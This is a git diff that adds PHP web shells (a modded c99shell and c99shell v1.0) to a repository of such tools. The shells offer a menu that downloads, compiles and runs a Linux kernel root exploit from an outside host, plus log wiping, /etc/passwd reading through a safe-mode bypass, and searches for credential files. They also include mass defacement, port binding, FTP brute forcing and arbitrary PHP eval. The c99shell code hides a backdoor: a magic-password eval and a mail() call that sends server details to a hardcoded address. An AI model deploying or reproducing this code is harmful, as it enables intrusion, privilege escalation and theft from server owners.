echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish) + <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces + <OPTION VALUE=""> + <OPTION VALUE="#"> [Root Exploits] + <OPTION VALUE=""> + <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1) + <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2) + <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3) + <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4) + <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces + </SELECT> + + <input type=hidden name="cmd_txt" value="1"> + &nbsp; + <input type=submit name=submit value="Execute"></div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center><br/><b> Kernel Information </b> +<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80> +&nbsp; +<input type=submit value="Search" name=btnG></form> +</center> + </td> +</tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><strong>PHP Safe-Mode Bypass (Read Files) </strong></div> + <br> + <form action="<?php echo 
$surl; ?>" method="post"> + <div align="center"> + File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> + <?php + function rsg_read() + { + $test=""; + $temp=tempnam($test, "cx"); + $file=$_REQUEST['file']; + $get=htmlspecialchars($file); + echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + + + echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>"; + unlink($temp); + } else { + echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File + <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have + access.</CENTER></FONT>"); + } + echo "</div>"; + } + + if(isset($_REQUEST['file'])) +{ +rsg_read(); +} + + ?> + + <? + + function rsg_glob() +{ +$chemin=$_REQUEST['directory']; +$files = glob("$chemin*"); +echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; +foreach ($files as $filename) { + echo "<pre>"; + echo "$filename\n"; + echo "</pre>"; +} +} + +if(isset($_REQUEST['directory'])) +{ +rsg_glob(); +} + +?> + + <br> + </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center> + <strong>PHP Safe-Mode Bypass (List Directories)</strong>: + <form action="<?php echo $surl; ?>" method="post"> + <div align="center"><br> + Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> + + </form></center> + </td> +</tr></TABLE> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center> + <b>Search</b> + <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" 
value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center> + <b>Upload</b> + <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center> + <b><strong>Create Directory + </strong> + <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center> + <strong>Create File </strong> + <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> + +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center> + <b>Enter Directory </b> + <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; 
?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+ <b>Access File</b>
+ <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse">
+ <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table>
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
+
diff --git a/php/PHPshell/c99_w4cking/c99_w4cking2.jpg b/php/PHPshell/c99_w4cking/c99_w4cking2.jpg
new file mode 100644
index 0000000..e1d451a
Binary files /dev/null and b/php/PHPshell/c99_w4cking/c99_w4cking2.jpg differ
diff --git a/php/PHPshell/c99shell/c99shell.jpg b/php/PHPshell/c99shell/c99shell.jpg
new file mode 100644
index 0000000..3b56c02
Binary files /dev/null and b/php/PHPshell/c99shell/c99shell.jpg differ
diff --git a/php/PHPshell/c99shell/c99shell.php b/php/PHPshell/c99shell/c99shell.php
new file mode 100644
index 0000000..3001c1e
--- /dev/null
+++ b/php/PHPshell/c99shell/c99shell.php
@@ -0,0 +1,2900 @@ +<?php +/* +****************************************************************************************************** +* +* c99shell.php v.1.0 (îٍ 5.02.2005) +* Freeware WEB-Shell. +* © CCTeaM. +* c99shell.php - ّهëë ÷هًهç www-لًîَçهً. +* آû ىîوهٍه ٌêà÷àٍü ïîٌëهني‏‏ âهًٌè‏ يà نîىàّيهé ًٌٍàيè÷êه ïًîنَêٍà: http://ccteam.ru/releases/c99shell +* +* WEB: http://ccteam.ru +* UIN: 656555 +* +* آîçىîويîٌٍè: +* ~ َïًàâëهيèه ôàéëàىè/ïàïêàىè, çàêà÷èâàيèه è ٌêà÷èâàيèه ôàéëîâ è ïàïêîê (ïًهنâîًèٍهëüيî ٌوèىàهٌٍے â tar) +* modify-time è access-time َ ôàéëîâ يه ىهيے‏ٌٍے ïًè + ًهنàêٍèًîâàيèè ôàéëîâ (âûêë./âêë. ïàًàىهًٍîى $filestealth) +* ~ ïًîنâèيٍَûé ïîèٌê ïî ôàéëàى/ïàïêàى (èùهٍ ٍàêوه âيًٍَè ôàéëîâ) +* ~ َïًàâëهيèه ïًîِهٌٌàىè unix-ىàّèيû, âîçىîويîٌٍü îٍïًàâêè ٌèميàëà çàâهًّهيèے, + à ٍàêوه لàيàëüيîه "ïًèلèâàيèه" ïًîِهٌٌà. +* ~ َنîليîه (èيîمنà مًàôè÷هٌêîه) âûïîëيهيèه ّهëë-êîىàين (ىيîمî àëèàٌîâ, ىîويî ëهمêî نîلàâëےٍü/َنàëےٍü èُ) +* ~ âûïîëيهيèه ïًîèçâîëüيîمî PHP-êîنà +* ~ âîçىîويîٌٍü لûًٌٍîمî ٌàىî-َنàëهيèے ٌêًèïٍà +* ~ لûًٌٍîه ftp-ٌêàيèًîâàيèه يà ٌâےçêè login;login èç + /etc/passwd (îلû÷يî نàهٍ نîٌٍَï ê 1/100 àêêàَيٍîâ) +* ~ ïًîنâèيٍَûé ىهيهنوهً SQL +* ~ ٌêًèïٍ "ë‏لèٍ" include, نëے يîًىàëüيîé ًàلîٍû, آàى يَويî ٌىهيèٍü $surl. +* ~ âîçىîويîٌٍü çàلèينèٍü /bin/bash يà îïًهنهëهييûé ïîًٍ ٌ ïًîèçâîëüيûى ïàًîëهى, + èëè ٌنهëàٍü back connect (ïًîèçâîنèٌٍے ٍهٌٍèًîâàيèه ٌîهنهيهيèے, + è âûâîنےٌٍے ïàًàىهًٍû نëے çàïٌَêà NetCat). +* +* +* 5.02.2005 © Captain Crunch Security TeaM +* +* Coded by tristram +****************************************************************************************************** +*/ +$shver = "1.0 beta (5.02.2005)"; //Current version +//CONFIGURATION +$surl = "?"; //link to this script, INCLUDE "?". +$rootdir = "./"; //e.g "c:", "/","/home" +$timelimit = 60; //limit of execution this script (seconds). + +//Authentication + +$login = ""; //login +//DON'T FOGOT ABOUT CHANGE PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. 
if null, md5($pass) +$login = false; //turn off authentication + +$autoupdate = true; //Automatic updating? + +$updatenow = false; //If true, update now + +$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server + +$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod + +$filestealth = 1; //if true, don't change modify&access-time + +$donated_html = ""; //If you publish free shell and you wish + //add link to your site or any other information, + //put here your html. +$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html. + +$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1") + +$curdir = "./"; //start directory + +$tmpdir = dirname(__FILE__); //Directory for tempory files + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext1","ext2","ext3",...), +// ... 
+// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"), + "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar") +); + +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 9999; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "11457"; // default port for binding + +/* Command-aliases system */ +$aliases = array(); +$aliases[] = array("-----------------------------------------------------------", "ls -la"); +/* ïîèٌê يà ٌهًâهًه âٌهُ ôàéëîâ ٌ suid لèٍîى */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè âٌهُ ôàéëîâ ٌ suid لèٍîى */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); +/* ïîèٌê يà ٌهًâهًه âٌهُ ôàéëîâ ٌ sgid لèٍîى */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè âٌهُ ôàéëîâ ٌ sgid لèٍîى */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); +/* ïîèٌê يà ٌهًâهًه ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); +/* ïîèٌê يà ٌهًâهًه ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\""); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . 
-type f -name \"config*\""); +/* ïîèٌê يà ٌهًâهًه âٌهُ نèًهêٍîًèé è ôàéëîâ نîٌٍَïيûُ يà çàïèٌü نëے âٌهُ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè âٌهُ نèًهêٍîًèé è ôàéëîâ نîٌٍَïيûُ يà çàïèٌü نëے âٌهُ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); +/* ïîèٌê يà ٌهًâهًه ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); +/* ïîèٌê يà ٌهًâهًه ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); +/* ïîèٌê âٌهُ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); +/* ïîèٌê âٌهُ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); +/* ïîèٌê â ٍهêَùهé نèًهêٍîًèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . 
-type f -name .fetchmailrc"); +/* âûâîن ٌïèٌêà àًٍèلٍَîâ ôàéëîâ يà ôàéëîâîé ٌèٌٍهىه ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); +/* ïًîٌىîًٍ îٍêًûٍûُ ïîًٍîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen"); + +$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie" +$sess_cookie = "c99shvars"; // cookie-variable name + +if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));} +$sess_file = $tmpdir."c99shvars_".$sid.".tmp"; + +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Delete copied files from buffer after pasting + +//Quick launch +$quicklaunch = array(); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd"); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"); +$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"); +$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d"); +$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d"); +$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d"); +$quicklaunch[] = array("<b>FTP 
Quick brute</b>",$surl."act=ftpquickbrute&d=%d"); +$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d"); +$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d"); +$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d"); +$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target"); +$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove"); +$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()"); + +//Hignlight-code colors +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; + +@$f = $_GET[f]; + +//END CONFIGURATION + +// \/ Next code not for editing \/ + + +//Starting calls +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +@set_time_limit(0); +if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);} +if(!ini_get("register_globals")) {import_request_variables("GPC");} +$starttime = getmicrotime(); +if (get_magic_quotes_gpc()) +{ +if (!function_exists("strips")) +{ + function strips(&$el) + { + if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} } + else {$el = stripslashes($el);} + } +} +strips($GLOBALS); +} +$tmp = array(); +foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} + +if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} +elseif(empty($md5_pass)) {$md5_pass = md5($pass);} +if(($PHP_AUTH_USER != $login ) or 
(md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"c99shell\"");
+ header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
+ c99sh_getupdate();
+ $data = file_get_contents($c99sh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+ $fp = fopen($sess_file,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) 
> $len)
+ {
+ $len = ceil($len/2) - 2;
+ return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+ else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+ if (!$ret) {return $ret;}
+ }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+ if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+ if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+ return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+ return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ $ret = true;
+ if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+ else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+ if (!$ret) {return $ret;}
+ }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+ if 
(substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+ if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+ return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ if (!is_dir($d.$o)) {unlink($d.$o);}
+ else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+ }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+ if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+ return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+ return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner['read'] = ($mode & 00400) ? "r" : "-";
+ $owner['write'] = ($mode & 00200) ? "w" : "-";
+ $owner['execute'] = ($mode & 00100) ? "x" : "-";
+ $group['read'] = ($mode & 00040) ? "r" : "-";
+ $group['write'] = ($mode & 00020) ? "w" : "-";
+ $group['execute'] = ($mode & 00010) ? "x" : "-";
+ $world['read'] = ($mode & 00004) ? "r" : "-";
+ $world['write'] = ($mode & 00002) ? "w" : "-";
+ $world['execute'] = ($mode & 00001) ? "x" : "-";
+
+ if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? 
"s" : "S";} + if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";} + + return $type.$owner['read'].$owner['write'].$owner['execute']. + $group['read'].$group['write'].$group['execute']. + $world['read'].$world['write'].$world['execute']; +} +} +if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}} +if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate() +{ + global $updatenow; + $data = @file_get_contents($c99sh_updatefurl); + if (!$data) {echo "Can't fetch update-information!";} + else + { + $data = unserialize(base64_decode($data)); + if (!is_array($data)) {echo "Corrupted update-information!";} + else + { + if ($shver < $data[cur]) {$updatenow = true;} + } + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = true;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + global $win; + if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + global $SERVER_ADDR; + global $SERVER_NAME; + $out = "# Dumped by C99Shell.SQL 
v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." +# Date: ".date("d.m.Y H:i:s")." +# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret[err][] = mysql_error();} + else + { + $row = mysql_fetch_row($res); + $out .= $row[1].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret[err][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $ret; +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $a; + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $handle = opendir($d); + while ($f = readdir($handle)) + { + $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f)); + if($f != "." 
